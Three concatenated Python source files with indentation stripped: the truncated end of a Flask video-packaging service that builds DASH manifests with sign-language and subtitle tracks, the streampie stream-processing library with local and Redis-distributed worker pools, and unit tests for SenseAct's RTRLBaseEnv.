+ "_" + str(resolution) +"p.mp4"]
ret = subprocess.call(args)
if ret!= 0:
shutil.rmtree(workdir)
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not transcode the base video" } )
return
mp4boxArgs = ["MP4Box", "-dash", "2000", "-profile", "live", "-out", outputDir + "manifest.mpd"]
audios = [ {'url': videoFile, 'urn:mpeg:dash:role:2011': 'main', 'language': mapLang(originalLang)}]
if "audio" in content["files"]:
for a in content["files"]["audio"]:
audios = audios + [a]
subtitles = []
if "subtitle" in content["files"]:
subtitles = content["files"]["subtitle"]
signers = []
if "signer" in content["files"]:
signers = content["files"]["signer"]
sls = []
for signer in signers:
#for signer in signers:
#Only use the first SL for now
signerFile = signer["url"] + "/index.xml"
try:
signerFile = download(workdir, signerFile)
except Exception:
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + signerFile } )
return
if not os.path.isfile(signerFile):
shutil.rmtree(workdir)
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "The SL couldn't be fetched" } )
return
signerTree=ET.parse(signerFile)
signerRoot=signerTree.getroot()
slVids = []
for el in signerRoot.iter():
if el.tag == "video":
try:
vid = download(workdir, signer["url"] + el.get("src"))
except Exception:
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + signer["url"] + el.get("src") } )
return
slVids = slVids + [{"id" : el.get("{http://www.w3.org/XML/1998/namespace}id"), "begin": el.get("begin"), "end": el.get("end"), "file": vid}]
#suppose we are at 600x600
segments = []
for el in signerRoot.findall(".//{http://www.w3.org/ns/ttml}body/{http://www.imac-project.eu}slSegments/{http://www.w3.org/ns/ttml}div/{http://www.w3.org/ns/ttml}p"):
if el.tag == "{http://www.w3.org/ns/ttml}p":
f = workdir + el.get("{http://www.w3.org/XML/1998/namespace}id") + ".mp4"
segments = segments + [{"id" : el.get("{http://www.w3.org/XML/1998/namespace}id"), "begin": el.get("begin"), "end": el.get("end"), "file": f}]
# transcoding so we are frame accurate
#TODO: trim if diff < threshold
for i in range(len(segments)):
print("cutting between " +segments[i]["begin"] + " and "+ segments[i]["end"])
args = ["ffmpeg", "-y", "-i", slVids[0]["file"], "-ss", segments[i]["begin"], "-to", segments[i]["end"], "-filter:v", 'crop=ih:ih,scale=600:600,fps=fps=30', "-bf", "0", "-crf", "22", "-c:v",
"libx264", "-keyint_min", "60", "-g", "60", "-sc_threshold", "0","-write_tmcd", "0", "-an", segments[i]["file"]]
ret = subprocess.call(args)
blanks = ["" for i in range(len(segments))]
for i in range(len(segments)):
if i < len(segments)-1:
duration = (tcToMilliseconds(segments[i+1]["begin"]) - tcToMilliseconds(segments[i]["end"]))/1000.0
if duration >0:
blank = workdir + segments[i]["id"] + "_" + segments[i+1]["id"] + ".mp4"
blanks[i] = blank
args = ["ffmpeg", "-t", str(duration), '-f', 'lavfi', '-i', 'color=c=black:s=600x600:rate=30', '-c:v', 'libx264', '-tune', 'stillimage', '-pix_fmt', 'yuv420p', blank]
ret = subprocess.call(args)
playlist = "# playlist to concatenate"
for i in range(len(segments)):
playlist = playlist+ "\n file '" + segments[i]["file"] +"'"
if i < len(segments)-1 and blanks[i] != "":
playlist = playlist + "\n file '" + blanks[i] +"'"
print("Encoding sign language stuff")
print(playlist)
with open(workdir + "/list.txt", "w") as f:
f.write(playlist)
outsl = workdir + "/sl" + signer["language"] +".mp4"
args = ["ffmpeg", "-f", "concat", "-safe", "0", "-i", workdir + "/list.txt", "-bf", "0", "-b:v", "500k", "-minrate", "500k", "-maxrate", "500k", "-c:v","libx264", "-keyint_min", "60", "-g", "60", "-sc_threshold", "0","-write_tmcd", "0", "-an", outsl]
ret = subprocess.call(args)
sls = sls + [{"file": outsl, "role": signer["urn:mpeg:dash:role:2011"], "language": signer["language"]}]
#if audio is muxed, only take the video from it
mp4boxArgs = mp4boxArgs
for resolution in resolutions:
mp4boxArgs = mp4boxArgs + [outputDir + videoBasename + "_" + str(resolution) +"p.mp4#video:role=main"]
for audio in audios:
try:
f = download(outputDir, audio["url"], "-" + audio["language"])
except Exception:
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + audio["url"]} )
return
if f.endswith(".aac"):
arg = ["MP4Box", "-add", f, f.replace(".", "-")+".mp4"]
subprocess.call(arg)
# set the correct language
arg = ["MP4Box", "-lang", mapLang(audio["language"]), f.replace(".", "-")+".mp4"]
subprocess.call(arg)
mp4boxArgs = mp4boxArgs + [ f+".mp4"+"#audio:role="+audio["urn:mpeg:dash:role:2011"]]
elif f.endswith(".mp4"):
arg = ["MP4Box", "-lang", mapLang(audio["language"]), f]
subprocess.call(arg)
mp4boxArgs = mp4boxArgs + [f+"#audio:role="+audio["urn:mpeg:dash:role:2011"]]
elif f.endswith(".ad"): #TODO extract & stuff
continue
else:
mp4boxArgs = mp4boxArgs + [f+"#audio:role="+audio["urn:mpeg:dash:role:2011"]]
if os.path.isfile(outputDir + videoBasename):
print("Video exists")
print(' '.join(mp4boxArgs))
ret = subprocess.call(mp4boxArgs)
if ret != 0:
print("MP4Box failed")
print(' '.join(mp4boxArgs))
shutil.rmtree(workdir)
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Couldn't DASH the assets" } )
return
tree=ET.parse(outputDir + "manifest.mpd")
root=tree.getroot()
# Fix once we have all SL segments
for sl in sls:
sl["manifest"] = os.path.basename (sl["file"]).replace(".mp4", "") + ".mpd"
mp4boxArgsSL = ["MP4Box", "-dash", "2000", "-profile", "live", "-out", outputDir + sl["manifest"]]
mp4boxArgsSL = mp4boxArgsSL + [ sl["file"] + "#video:role="+ sl["role"]]
subprocess.call(mp4boxArgsSL)
for item in root.findall('{urn:mpeg:dash:schema:mpd:2011}Period'):
AS = ET.Element("AdaptationSet")
AS.set("contentType", "video")
AS.set("id","signerVideo_" + mapLang(sl["language"]))
AS.set("lang", "sgn-"+mapLangSL(sl["language"]))
supp = ET.Element("SupplementalProperty")
supp.set("schemeIdUri", "urn:imac:signer-metadata-adaptation-set-id:2019")
supp.set("value","signerMetadata_" + mapLang(sl["language"]))
AS.append(supp)
role = ET.Element("Role")
role.set("schemeIdUri", "urn:mpeg:dash:role:2011")
role.set("value", "sign") #until fixed in the ACM
AS.append(role)
representation = ET.Element("Representation")
representation.set("id", "signer_600")
BaseURL = ET.Element("BaseURL")
BaseURL.text = sl["manifest"]
representation.append(BaseURL)
AS.append(representation)
item.append(AS)
print("Sign language added")
for i, sub in enumerate(subtitles):
try:
subFile = download(outputDir, sub["url"])
except Exception:
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + sub["url"]} )
return
basename = os.path.splitext(os.path.basename(sub["url"]))[0]
extension = os.path.splitext(os.path.basename(sub["url"]))[1]
for item in root.findall('{urn:mpeg:dash:schema:mpd:2011}Period'):
AS = ET.Element("AdaptationSet")
AS.set("contentType", "text")
AS.set("mimeType","application/ttml+xml")
AS.set("segmentAlignment", "true")
AS.set("lang", mapLang(sub["language"]))
role = ET.Element("Role")
role.set("schemeIdUri", "urn:mpeg:dash:role:2011")
role.set("value", "subtitle") #until fixed in the ACM
AS.append(role)
representation = ET.Element("Representation")
representation.set("id", "xml_" + mapLang(sub["language"]) + "_" + str(i))
representation.set("bandwidth", "1000")
BaseURL = ET.Element("BaseURL")
BaseURL.text = basename + extension
representation.append(BaseURL)
AS.append(representation)
item.append(AS)
print("Subtitle added")
hasAD=False
ases = root.findall(".//{urn:mpeg:dash:schema:mpd:2011}Period/{urn:mpeg:dash:schema:mpd:2011}AdaptationSet")
for AS in ases:
if AS.find("{urn:mpeg:dash:schema:mpd:2011}Role").get("value") == "alternate":
reps = AS.findall("{urn:mpeg:dash:schema:mpd:2011}Representation")
for rep in reps:
print(rep.find("{urn:mpeg:dash:schema:mpd:2011}SegmentTemplate").get("media"))
for audio in content["files"]["audio"]:
if audio["containsAD"] == "1" and os.path.splitext(os.path.basename(audio["url"]))[0] in rep.find("{urn:mpeg:dash:schema:mpd:2011}SegmentTemplate").get("media"):
hasAD = True
ad = ET.Element("AudioDescription")
ad.set("gain", audio["ADgain"])
if "classic" in os.path.splitext(os.path.basename(audio["url"]))[0]:
ad.set("mode", "classic")
elif "static" in os.path.splitext(os.path.basename(audio["url"]))[0]:
ad.set("mode", "static")
elif "dynamic" in os.path.splitext(os.path.basename(audio["url"]))[0]:
ad.set("mode", "dynamic")
break
rep.append(ad)
ET.register_namespace('', "urn:mpeg:dash:schema:mpd:2011")
if hasAD:
ET.register_namespace('imac', "urn:imac:audio-description:2019")
#tree.write(outputDir + "manifest.mpd", xml_declaration=True)
print("Writing manifest")
with open(outputDir+ "manifest.mpd", "wb") as xmlfile:
mydata = ET.tostring(root)
xmlfile.write(mydata)
isDash2 = "dash2" in content["publicationCdn"]
directory = "dash"
if isDash2:
directory = directory + "2"
removeDupicates(outputDir+ "manifest.mpd")
with open(jsonBDD) as f:
data = json.load(f)
subs = [dict()]
if "ST" in content["acces"]:
for acc in content["acces"]["ST"]:
for s in subtitles:
if s["language"] == acc:
base = os.path.splitext(os.path.basename(s["url"]))[0]
ext = os.path.splitext(os.path.basename(s["url"]))[1]
subs[0][acc]= "https://imac.gpac-licensing.com/" + directory + "/" + dirName +base+ext
slDic = [dict()]
if "SL" in content["acces"]:
for acc in content["acces"]["SL"]:
for s in sls:
if s["language"] == acc:
slDic[0][acc]= "https://imac.gpac-licensing.com/"+ directory+ "/" + dirName + s["manifest"]
data["contents"].append({
"acces":content["acces"], "descriptionArray":[content["descriptionArray"]],
"name": str(len(data["contents"])+1) + ": " + content["programmeName"],
"thumbnail": content["keyframe"],
"url": "https://imac.gpac-licensing.com"+ directory+"/" + dirName + "manifest.mpd",
"audioChannels" : 4,
"subtitles": subs,
"signer": slDic,
"poster": content["poster"],
"ad": [],
"ast": []
})
print("Writing json database")
with open(jsonBDD, 'w') as outfile:
json.dump(data, outfile, indent=2)
shutil.rmtree(workdir)
sendResp(content["callbackUrl"], {"result":1, "assetId":content["assetId"], "language": content["language"], "msg": "The content has been successfully packaged" } )
@app.route("/package", methods=["POST"])
def add_message():
content = request.json
process = Thread(target=package, args=[content])
process.start()
return "Packaging started"
|
streampie.py
|
import sys
import zlib
import dill
import redis
import random
import inspect
import threading
import traceback
import itertools
import collections
import multiprocessing
try:
# Python2
import Queue as queue
ifilter = itertools.ifilter
imap = itertools.imap
except:
# Python3
import queue
# In python3, filter and map by default return iterators
ifilter = filter
imap = map
def _ifilter_ext(predicate, iterable):
for i, val in enumerate(iterable):
if predicate and predicate(i, val):
yield val
def _iterqueue(queue):
"""
Take a queue and return an iterator over that queue.
"""
while 1:
item = queue.get()
if item is StopIteration:
queue.put(StopIteration)
break
yield item
class Stream():
"""
This is our generic stream class. It is iterable and it overloads the ``>>`` operator
for convenience.
"""
def __init__(self, obj=None):
self.iterator = None
if isinstance(obj, collections.Iterable):
self.iterator = iter(obj)
def __iter__(self):
return self
# For python3
def __next__(self):
return self.next()
def next(self):
return next(self.iterator)
def __rshift__(self, other):
if inspect.isclass(other):
return other(self)
other.iterator = self
other._on_connect()
return Stream(other)
def __rrshift__(self, other):
return Stream(other) >> self
def __repr__(self):
return "Stream(%s)" % repr(self.iterator)
def _on_connect(self):
return NotImplemented
#
# Stream Processors
#
class take(Stream):
def __init__(self, n):
"""
Take the first ``n`` elements, and drop the rest.
>>> range(4) >> take(2) >> list
[0, 1]
"""
Stream.__init__(self)
self.n = n
def __iter__(self):
return itertools.islice(self.iterator, self.n)
class takei(Stream):
def __init__(self, indices):
"""
Take only the elements whose indices are given in the list.
>>> range(4) >> takei([0, 1]) >> list
[0, 1]
"""
Stream.__init__(self)
self.indices = indices
def __iter__(self):
def _filter(i, val):
return i in self.indices
return _ifilter_ext(_filter, self.iterator)
class drop(Stream):
def __init__(self, n):
"""
Drop the first `n` elements, and take the rest.
>>> range(4) >> drop(2) >> list
[2, 3]
"""
Stream.__init__(self)
self.n = n
def __iter__(self):
collections.deque(itertools.islice(self.iterator, self.n))
return self.iterator
class dropi(Stream):
def __init__(self, indices):
"""
Drop only the elements whose indices are given in the ``indices`` list.
>>> range(4) >> dropi([0, 1]) >> list
[2, 3]
"""
Stream.__init__(self)
self.indices = indices
def __iter__(self):
def _filter(i, val):
return not i in self.indices
return _ifilter_ext(_filter, self.iterator)
class chop(Stream):
def __init__(self, n):
"""
Split the stream into ``n``-sized chunks.
>>> range(4) >> chop(2) >> list
[[0, 1], [2, 3]]
"""
Stream.__init__(self)
self.n = n
def __iter__(self):
def _chop():
while 1:
chunk = list(itertools.islice(self.iterator, self.n))
if not chunk:
break
yield chunk
return _chop()
class map(Stream):
def __init__(self, function):
"""
Call the function ``func`` for every element, with the element as input.
>>> square = lambda x: x**2
>>> range(4) >> map(square) >> list
[0, 1, 4, 9]
"""
Stream.__init__(self)
self.function = function
def __iter__(self):
return imap(self.function, self.iterator)
class filter(Stream):
def __init__(self, function):
"""
Return only the elements for which the predicate ``func`` evaluates to ``True``.
>>> even = lambda x: x % 2 == 0
>>> range(4) >> filter(even) >> list
[0, 2]
"""
Stream.__init__(self)
self.function = function
def __iter__(self):
return ifilter(self.function, self.iterator)
class apply(Stream):
def __init__(self, function):
"""
Call the function ``func`` for every element, with the element as arguments.
>>> sum = lambda x,y: x+y
>>> range(4) >> chop(2) >> apply(sum) >> list
[1, 5]
"""
Stream.__init__(self)
self.function = function
def __iter__(self):
return itertools.starmap(self.function, self.iterator)
class takewhile(Stream):
def __init__(self, predicate):
"""
Keep taking elements until the predicate ``func`` is ``True``, then stop.
>>> range(4) >> takewhile(lambda x: x < 3) >> list
[0, 1, 2]
"""
Stream.__init__(self)
self.predicate = predicate
def __iter__(self):
return itertools.takewhile(self.predicate, self.iterator)
class dropwhile(Stream):
def __init__(self, predicate):
"""
Keep dropping elements until the predicate ``func`` is ``True``, then stop.
>>> range(4) >> dropwhile(lambda x: x < 3) >> list
[3]
"""
Stream.__init__(self)
self.predicate = predicate
def __iter__(self):
return itertools.dropwhile(self.predicate, self.iterator)
class prepend(Stream):
def __init__(self, prep_iterator):
"""
Prepend elements to a stream.
>>> range(4) >> prepend([10, 9]) >> list
[10, 9, 0, 1, 2, 3]
"""
Stream.__init__(self)
self.prep_iterator = prep_iterator
def __iter__(self):
return itertools.chain(self.prep_iterator, self.iterator)
class flatten(Stream):
"""
Flatten an arbitrarily-deep list of lists into a single list.
>>> [0,[1,[2,[3]]]] >> flatten() >> list
[0, 1, 2, 3]
"""
def __iter__(self):
def _flatten(iterator):
stack = []
while 1:
try:
item = next(iterator)
if isinstance(item, collections.Iterable):
stack.append(iter(item))
else:
yield item
except StopIteration:
try:
iterator = stack.pop()
except IndexError:
break
return _flatten(self.iterator)
#
# Paralellism
#
class LocalPool(Stream):
def __init__(self, function, poolsize=None, args=[]):
"""
A generic class shared by all local (executed on the same machine) pools.
"""
Stream.__init__(self)
self.function = function
self.poolsize = poolsize
self.args = args
self.pool = []
if self.poolsize == None:
# No prefered poolsize? Use number of cores
self.poolsize = multiprocessing.cpu_count()
def _worker(self, wid):
try:
for val in self.function(wid, _iterqueue(self.in_queue), *self.args):
self.out_queue.put(val)
except:
# Catch all exceptions and just print them, but keep working
traceback.print_exc()
def _control(self):
# Move all data from the iterator to the input queue
for val in self.iterator:
self.in_queue.put(val)
# Last item in the queue is the stop-signal
self.in_queue.put(StopIteration)
# Wait for all workers to finish
for p in self.pool:
p.join()
# All workers finished, stop the output queue iterator
self.out_queue.put(StopIteration)
def stop(self):
"""
Terminate and wait for all workers to finish.
"""
# Wait for all workers to finish
for p in self.pool:
p.terminate()
def __iter__(self):
return _iterqueue(self.out_queue)
def _on_connect(self):
# Start the control thread
t = threading.Thread(target=self._start_workers)
t.daemon = True
t.start()
class ProcessPool(LocalPool):
def __init__(self, function, poolsize=None, args=[]):
"""
Create a process pool.
:param int function: Function that each worker executes
:param int poolsize: How many workers the pool should make
:param list args: List of arguments to pass to the worker function
A simple that calls the ``sum`` function for every pair of inputs.
>>> def sum(wid, items):
... # wid is the worker id
... # items is an iterator for the inputs to the stream
... for x, y in items:
... yield x + y
>>> range(6) >> chop(2) >> ProcessPool(sum) >> list # doctest: +SKIP
[1, 5, 9]
Note that the order of the output list is not guaranteed, as it depends
in which order the elements were consumed. By default, the class creates
as many workers as there are cores. Here is a more advanced examples
showing ``poolsize`` control and passing additional arguments.
>>> def sum(wid, items, arg1, arg2):
... # arg1 and arg2 are additional arguments passed to the function
... for x, y in items:
... yield x + y
>>> sorted(range(6) >> chop(2) >> ProcessPool(sum, poolsize=8, args=[0, 1]) >> list)
[1, 5, 9]
The function can yield arbitrarily many results. For example, for a single input, two or more
yields can be made.
>>> def sum(wid, items):
... for x, y in items:
... yield x + y
... yield x + y
>>> sorted(range(6) >> chop(2) >> ProcessPool(sum) >> list)
[1, 1, 5, 5, 9, 9]
"""
LocalPool.__init__(self, function, poolsize, args)
self.in_queue = multiprocessing.Queue()
self.out_queue = multiprocessing.Queue()
def _start_workers(self):
# Start the worker processes
for x in range(self.poolsize):
p = multiprocessing.Process(target=self._worker, args=[x])
p.daemon = True
p.start()
self.pool.append(p)
self._control()
class ThreadPool(LocalPool):
def __init__(self, function, poolsize=None, args=[]):
"""
Create a thread pool.
:param int function: Function that each worker executes
:param int poolsize: How many workers the pool should make
:param list args: List of arguments to pass to the worker function
>>> def sum(wid, items):
... # wid is the worker id
... # items is an iterator for the inputs to the stream
... for x, y in items:
... yield x + y
>>> range(6) >> chop(2) >> ThreadPool(sum) >> list # doctest: +SKIP
[1, 5, 9]
"""
LocalPool.__init__(self, function, poolsize, args)
self.in_queue = queue.Queue()
self.out_queue = queue.Queue()
def _start_workers(self):
# Start the worker threads
for x in range(self.poolsize):
t = threading.Thread(target=self._worker, args=[x])
t.daemon = True
t.start()
self.pool.append(t)
self._control()
class StandaloneProcessPool(ProcessPool):
def __init__(self, function, poolsize=None, args=[]):
"""
The standalone process pool is exactly like the :class:`ProcessPool` class, other than
the fact that it does not take any input, but constantly yields output.
:param int function: Function that each worker executes
:param int poolsize: How many workers the pool should make
:param list args: List of arguments to pass to the worker function
To illustrate, here is an example of a worker that constantly returns random numbers.
Since there is no input stream, the pool needs to be manually terminated.
>>> import random
>>> def do_work(wid):
... yield random.random()
>>> pool = StandaloneProcessPool(do_work)
>>> for x, r in enumerate(pool): # doctest: +SKIP
... if x == 2:
... pool.stop()
... break
... print r
0.600151963181
0.144348185086
"""
ProcessPool.__init__(self, function, poolsize, args)
self.iterator = _iterqueue(self.out_queue)
multiprocessing.Process(target=self._start_workers).start()
def _worker(self, wid):
try:
for val in self.function(wid, *self.args):
self.out_queue.put(val)
except:
# Catch all exceptions and just print them, but keep working
traceback.print_exc()
def _control(self):
# Wait for all workers to finish
for p in self.pool:
p.join()
# All workers finished, stop the output queue iterator
self.out_queue.put(StopIteration)
#
# Distributed Paralellism
#
def _dumps(obj):
"""
Serialize and compress an object.
"""
return zlib.compress(dill.dumps(obj))
def _loads(data):
"""
Decompress and deserialize.
"""
return dill.loads(zlib.decompress(data))
class Job:
def __init__(self, target_id, args=[]):
"""
This class is our unit of work. It it fetched by a :class:`Worker`, it's ``target`` is executed, the
result (``ret``) and exception (if any) is stored and sent back to the JobQueue.
:param int target_id: ID of the code to execute. See the source of :class:`JobQueue.enqueue` for details.
:param list args: List of arguments to pass to the worker function
"""
self.id = random.getrandbits(32)
self.target_id = target_id
self.args = args
# The return and exception values are populated by the Worker later on
self.ret = None
self.exception = None
class Worker:
def __init__(self, host="localhost", port=6379, db=10):
"""
The workhorse of our implementation. Each worker fetches a job from Redis,
executes it, then stores the results back into Redis.
:param str host: Redis hostname
:param int port: Redis port
:param int db: Redis database number
"""
self.db = redis.Redis(host=host, port=port, db=db)
self.target_cache = {}
def _fetch_job(self):
return _loads(self.db.blpop("job_queue")[1])
def _do_job(self, target, job):
try:
args = job.args
if not isinstance(args, list) and not(isinstance(args, tuple)):
# Make sure that args are always a list/tuple
args = [args]
job.ret = target(*args)
except Exception as e:
# An exception occured, print and log it
traceback.print_exc()
job.exception = e
# Aadd the job to the response queue
self.db.rpush("response_queue", _dumps(job))
def run(self):
"""
In an infinite loop, wait for jobs, then execute them and return the results to Redis.
"""
while 1:
# Blocks until a job is available
job = self._fetch_job()
if job.target_id in self.target_cache:
# We have the target code cached, great!
target = self.target_cache[job.target_id]
else:
# Fetch the code from redis and cache it
target = _loads(self.db.get("target_%d" % (job.target_id)))
self.target_cache[job.target_id] = target
print("Got job: 0x%08x" % (job.id))
# Execute the job in a separate process
p = multiprocessing.Process(target=self._do_job, args=(target, job))
p.daemon = True
p.start()
p.join()
class JobQueue(Stream):
def __init__(self, host="localhost", port=6379, db=10):
"""
.. warning:: The :class:`JobQueue` flushes the selected Redis database! Be sure to specify an unused database!
The queue that allows submission and fetching of completed jobs.
:param str host: Redis hostname
:param int port: Redis port
:param int db: Redis database number
That being said, here is an example of how to use the queue.
>>> def sum(x, y):
... return x + y
>>> q = JobQueue()
>>> q.enqueue(sum, (1, 2)) # doctest: +SKIP
>>> q.enqueue(sum, (2, 3)) # doctest: +SKIP
>>> q.enqueue(sum, (3, 4)) # doctest: +SKIP
>>> q.finalize()
>>> for r in q: # doctest: +SKIP
... print r.ret
3
5
7
"""
Stream.__init__(self)
self.db = redis.Redis(host=host, port=port, db=db)
self.db.flushdb()
self.cnt_queued = 0
self.cnt_got = 0
self.finalized = False
def next(self):
if self.finalized and self.cnt_got == self.cnt_queued:
raise StopIteration
job = _loads(self.db.blpop("response_queue")[1])
self.cnt_got += 1
return job
def enqueue(self, target, args):
"""
Add a job to the queue.
:param function target: Function to be executed
:param list args: Arguments provided to the job
"""
if self.finalized:
raise Exception("No more jobs allowed")
# Check if we have to add the target's code to redis
target_data = _dumps(target)
target_id = hash(target_data)
if not self.db.get("target_%d" % (target_id)):
# This target does not exist, add it to the cache so that we don't have to download
# the method code every time a job is submitted/fetched.
self.db.set("target_%d" % (target_id), target_data)
# Add the new job to the redis list
self.db.rpush("job_queue", _dumps(Job(target_id, args)))
self.cnt_queued += 1
def finalize(self):
"""
Indicate to the queue that no more jobs will be submitted.
"""
self.finalized = True
class DistributedPool(Stream):
def __init__(self, function, host="localhost", port=6379, db=10):
"""
The distributed pool is a simple wrapper around the :class:`JobQueue` that makes is even more
convenient to use, just like :class:`ProcessPool` and :class:`ThreadPool`.
:param str host: Redis hostname
:param int port: Redis port
:param int db: Redis database number
First, on one machine let's start a single worker.
.. code-block:: bash
python streampie.py
We then execute:
>>> def mul(x, y):
... return x * y
>>> range(4) >> chop(2) >> DistributedPool(mul) >> list # doctest: +SKIP
[0, 6]
"""
Stream.__init__(self)
self.in_queue = queue.Queue()
self.out_queue = queue.Queue()
self.function = function
self.jq = JobQueue(host=host, port=port, db=db)
def _input_control(self):
# Move all data from the iterator to the input queue
for val in self.iterator:
self.jq.enqueue(self.function, val)
# Indicate to the queue that no more jobs will be added
self.jq.finalize()
def _output_control(self):
# Move all data from the job queue to the output queue
for job in self.jq:
self.out_queue.put(job.ret)
# All workers finished, stop the output queue iterator
self.out_queue.put(StopIteration)
def __iter__(self):
return _iterqueue(self.out_queue)
def _on_connect(self):
# Start the input and output control threads
self._input_thread = threading.Thread(target=self._input_control)
self._input_thread.daemon = True
self._input_thread .start()
self._output_control()
def stop(self):
"""
Currently not implemented. Is it even needed?
"""
return NotImplemented
if __name__ == "__main__":
# Act as a simple worker process
print("Starting worker...")
w = Worker()
w.run()
w.stop()
|
test_rtrl_base_env.py
|
# Copyright (c) 2018, The SenseAct Authors.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import copy
import numpy as np
import unittest
import time
import psutil
from multiprocessing import Process, Value, Array
from senseact import utils
from senseact.rtrl_base_env import RTRLBaseEnv
from senseact.communicator import Communicator
class MockCommunicator(Communicator):
"""
Basic barebone test communicator that can crash on demand.
"""
def __init__(self):
self._dt = 0.008
# shared variable that all processes will see
self.crash_flag = Value('i', 0)
sensor_args = {'array_len': 1, 'array_type': 'd', 'np_array_type': 'd'}
actuator_args = {'array_len': 1, 'array_type': 'd', 'np_array_type': 'd'}
super().__init__(use_sensor=True, use_actuator=True, sensor_args=sensor_args, actuator_args=actuator_args)
def _sensor_handler(self):
if self.crash_flag.value == 1:
raise Exception("Random sensor exception encountering")
self.sensor_buffer.write(0)
time.sleep(self._dt)
def _actuator_handler(self):
if self.crash_flag.value == 2:
raise Exception("Random actuator exception encountering")
if self.actuator_buffer.updated():
actuation, _, _ = self.actuator_buffer.read_update()
time.sleep(self._dt)
class MockEnv(RTRLBaseEnv):
"""
Basic barebone test environment that can crash on demand.
"""
def __init__(self, action_dim, observation_dim, **kwargs):
# shared variable that all processes will see
self.crash_flag = Value('i', 0)
self.reset_call_flag = Value('i', 0)
# Communicator Parameters
communicator_setups = {'generic1': {'Communicator': MockCommunicator,
'kwargs': {}},
'generic2': {'Communicator': MockCommunicator,
'kwargs': {}}
}
self._uniform_array_ = np.frombuffer(Array('d', 3).get_obj(), dtype=np.float64)
super().__init__(communicator_setups=communicator_setups,
action_dim=action_dim,
observation_dim=observation_dim,
**kwargs)
def _write_action(self, action):
if self.crash_flag.value == 3:
raise Exception("Write action crash triggered.")
super(MockEnv, self)._write_action(action)
def _compute_sensation_(self, name, sensor_window, timestamp_window, index_window):
if self.crash_flag.value == 1:
raise Exception("Compute sensation crash triggered.")
return [3,2,1]
def _compute_actuation_(self, action, timestamp, index):
if self.crash_flag.value == 2:
raise Exception("Compute actuation crash triggered.")
self._actuation_packet_['generic1'] = action
self._actuation_packet_['generic2'] = action
values = self._rand_obj_.uniform(-1, +1, 3)
rand_state_array_type, rand_state_array_size, rand_state_array = utils.get_random_state_array(
self._rand_obj_.get_state()
)
np.copyto(self._shared_rstate_array_, np.frombuffer(rand_state_array, dtype=rand_state_array_type))
np.copyto(self._uniform_array_, values)
def _reset_(self):
self.reset_call_flag.value = 1
class TestRTRLBaseEnv(unittest.TestCase):
def setUp(self):
return
def tearDown(self):
return
def testInit(self):
env = RTRLBaseEnv({}, 2, 3)
self.assertFalse(env._running)
self.assertEqual(env._action_buffer.array_len, 2)
self.assertEqual(env._sensation_buffer.array_len, 5)
def testInitWithCommunicator(self):
env = RTRLBaseEnv({'generic': {'Communicator': MockCommunicator, 'kwargs': {}}}, 2, 3)
self.assertFalse(env._running)
self.assertEqual(len(env._all_comms), 1)
self.assertEqual(env._action_buffer.array_len, 2)
self.assertEqual(env._sensation_buffer.array_len, 5)
def testStartSingalthread(self):
env = RTRLBaseEnv({}, 2, 3, run_mode='singlethread')
env.start()
self.assertTrue(env._running)
env.close()
self.assertFalse(env._running)
def testStartMultithread(self):
env = RTRLBaseEnv({}, 2, 3, run_mode='multithread')
env.start()
self.assertTrue(env._running)
time.sleep(0.5)
self.assertTrue(env._polling_loop.is_alive())
env.close()
self.assertFalse(env._running)
self.assertFalse(env._polling_loop.is_alive())
def testStartMultiprocess(self):
env = RTRLBaseEnv({}, 2, 3, run_mode='multiprocess')
env.start()
self.assertTrue(env._running)
time.sleep(0.5)
self.assertTrue(env._polling_loop.is_alive())
env.close()
self.assertFalse(env._running)
self.assertFalse(env._polling_loop.is_alive())
def testNotImplementedError(self):
env = RTRLBaseEnv({}, 2, 3, run_mode='singlethread')
env.start()
with self.assertRaises(NotImplementedError):
env.step(0)
env.close()
def testStartWithCommunicator(self):
env = RTRLBaseEnv({'generic': {'Communicator': MockCommunicator, 'kwargs': {}}}, 2, 3, run_mode='singlethread')
env.start()
time.sleep(0.5)
self.assertTrue(env._running)
self.assertTrue(env._all_comms['generic'].is_alive())
env.close()
self.assertFalse(env._running)
self.assertFalse(env._all_comms['generic'].is_alive())
def testStepWithSinglethread(self):
env = MockEnv(1, 1, run_mode='singlethread')
env.start()
time.sleep(0.5)
obs, reward, done, info = env.step(0)
self.assertEqual(obs, [3])
self.assertEqual(reward, 2)
self.assertEqual(done, 1)
env.close()
def testStepWithMultithread(self):
env = MockEnv(1, 1, run_mode='multithread')
env.start()
time.sleep(0.5)
obs, reward, done, info = env.step(0)
self.assertEqual(obs, [3])
self.assertEqual(reward, 2)
self.assertEqual(done, 1)
env.close()
def testStepWithMultiprocess(self):
env = MockEnv(1, 1, run_mode='multiprocess')
env.start()
time.sleep(0.5)
obs, reward, done, info = env.step(0)
self.assertEqual(obs, [3])
self.assertEqual(reward, 2)
self.assertEqual(done, 1)
env.close()
def testResetSinglethread(self):
env = MockEnv(1, 1, run_mode='singlethread')
env.start()
time.sleep(0.5)
obs = env.reset()
self.assertEqual(obs, [3])
self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testResetMultithreadBlocking(self):
env = MockEnv(1, 1, run_mode='multithread')
env.start()
time.sleep(0.5)
obs = env.reset()
self.assertEqual(obs, [3])
self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testResetMultithreadNonblocking(self):
env = MockEnv(1, 1, run_mode='multithread')
env.start()
time.sleep(0.5)
obs = env.reset(blocking=False)
time.sleep(0.5)
self.assertEqual(obs, [3])
self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testResetMultiprocessBlocking(self):
env = MockEnv(1, 1, run_mode='multiprocess')
env.start()
time.sleep(0.5)
obs = env.reset()
self.assertEqual(obs, [3])
self.assertEqual(env.reset_call_flag.value, 1)
env.close()
def testResetMultiprocessNonblocking(self):
env = MockEnv(1, 1, run_mode='multiprocess')
env.start()
time.sleep(0.5)
obs = env.reset(blocking=False)
time.sleep(0.5)
self.assertEqual(obs, [3])
